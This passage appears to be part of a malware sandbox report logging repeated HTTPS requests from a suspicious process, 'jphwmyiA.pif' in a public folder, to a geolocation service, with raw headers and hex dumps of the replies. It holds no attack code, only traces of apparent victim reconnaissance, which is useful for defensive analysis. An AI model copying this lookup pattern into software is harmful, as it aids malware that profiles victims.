                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dmynYXe6JJFBXXyVd%2B0bIAc555EDHrbQs4sN5Eg9J30ifWOFAfhjTeXp2sQKzWGyp%2B2XWAucdnMIPi9jFMr9cVpvVArAL%2BSvhu2Tgoucvl%2FD2DeeH2VVwOFUxyE1X61cvaWlDY2H"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cba6be1741f9-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1773&rtt_var=666&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1646926&cwnd=216&unsent_bytes=0&cid=d88330b70a4594c3&ts=238&x=0"
                                                                                                                                          2025-01-06 06:54:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.549730188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:14 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:14 UTC865INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:14 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461243
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p0ZiXX9DQScieFXQb8%2FMMuXps1Yp7u1HtcRg7slyIdM87MV54vyaoIkTX%2B4xrq3k%2BG0clmNBC%2FvufiU16p6roTpqNTg%2BxnKhOn54%2FJ99%2F2U1lfIvAnn%2FnOzVRpdZ5HI57oFhWkv7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbaccd737d0c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2043&rtt_var=777&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1399808&cwnd=156&unsent_bytes=0&cid=8d6d838247aeaae1&ts=148&x=0"
                                                                                                                                          2025-01-06 06:54:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.549733188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:15 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:15 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:15 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461245
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWTPUraCzA5Pv4bQ0BGIt5nUQgEB98S21Utvd%2F1qFVOznBte9C6dlBmZEx55tpjSJWSzxn%2BeCbtKouD2wUR4KgMFrwAmDlcZyYrbcFUAvdJRPQ2e7WtiV0qewMylTriPLyrgH%2FEQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbb579d04339-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1571&rtt_var=598&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1815920&cwnd=227&unsent_bytes=0&cid=2f4bf27cba799234&ts=153&x=0"
                                                                                                                                          2025-01-06 06:54:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.553582188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:17 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:17 UTC850INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:17 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461246
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aoNwveNeeb2eUb8XDhblTmBZG5SaHdMJ92myKeNo7HxuKki9Sm3KDJ9t%2BzrxeqXuqnAAhXz2g30nt6NhvqYTTgteC4kt5ComcpvttfDS2zmVzqZ9EsaV8UcUKeXNZxX480l7mwW1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbbe9da40f43-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1636&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1750599&cwnd=32&unsent_bytes=0&cid=e1f4ebd3dea185aa&ts=155&x=0"
                                                                                                                                          2025-01-06 06:54:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.553591188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:19 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:19 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461248
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aCiDaoKnepmgsy%2BquECAmIZogswgb9e5osPap6V%2FAD5VKnPITieF%2FydxFLM3ofdB1L00q0z8LLNbCxHxeFkPcakj2%2FTjSboJsdaWMCg8i%2F9g29IWRCXGntEOTG4SWHSgzVvuCtNz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbc8bbdd4295-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1712&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1663817&cwnd=252&unsent_bytes=0&cid=e0793f58be739003&ts=144&x=0"
                                                                                                                                          2025-01-06 06:54:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.553604188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:20 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:20 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461249
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWmyelvs5PxPPhrBRnJCwrx6QnId1jxNka2%2BV2rTY5qLUiW8Q7HaPUO7yB%2BMC8H9mfsdiDz5iygKcEnI5MPkSeCB7Iw0llTEsHuFtmr6IyqXtqoLuhNZQs58BX%2BXriUVeGLPOR%2FN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbd18e85de92-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1456&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1932495&cwnd=246&unsent_bytes=0&cid=13e32961770a267d&ts=147&x=0"
                                                                                                                                          2025-01-06 06:54:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.553612188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:21 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:22 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:22 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461251
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wo9EkUV40RF0qcEL5r63%2BlZhu2mpkYTZ2KjdciMaoTCj7LgiYiY3diNNb6%2F9vZgEMqla%2FWeLrh184t7nODDi0JsOml2%2BWOfzvHU7CG45e8ALyjpdPQsqUcaT%2FMsocMljdNqcD2RD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbdbea88efa9-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2005&rtt_var=772&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1399137&cwnd=158&unsent_bytes=0&cid=1f88f0b69e3768cc&ts=151&x=0"
                                                                                                                                          2025-01-06 06:54:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.553624188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:23 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:23 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:23 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461252
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wu4W0a%2FNPbbKen0pZz5TQ7tDGqz%2BJld6vJaxg0ms0ptrIs%2BgUoJ1zeaDEsk8FOafP3KzFNCfGmCw3UwFY8MyD5sqqGeLQsZhVpIFH5uV%2Bv5P7BL5cfZr4AaTJcHCAtCPCsC8VekL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbe49de4c328-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1632&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1755862&cwnd=177&unsent_bytes=0&cid=735a7068e5f059b1&ts=155&x=0"
                                                                                                                                          2025-01-06 06:54:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.553636188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:24 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461253
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2B1il1lvb4T8V7sjJYuLD8uOaAYTzo0s7cLQMKuH10%2FmOt9P4ueDUVrzFi68wC%2BoIjgUcQILM3BIUs4xjzKvvnLsQ1f%2BxjTaIyngnMR%2FtgYjF8552PtClyT9HMfD6mrk6Tm4gGLr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbecfe0f43c2-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1794714&cwnd=162&unsent_bytes=0&cid=da25282e4e71a675&ts=170&x=0"
                                                                                                                                          2025-01-06 06:54:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.553637188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
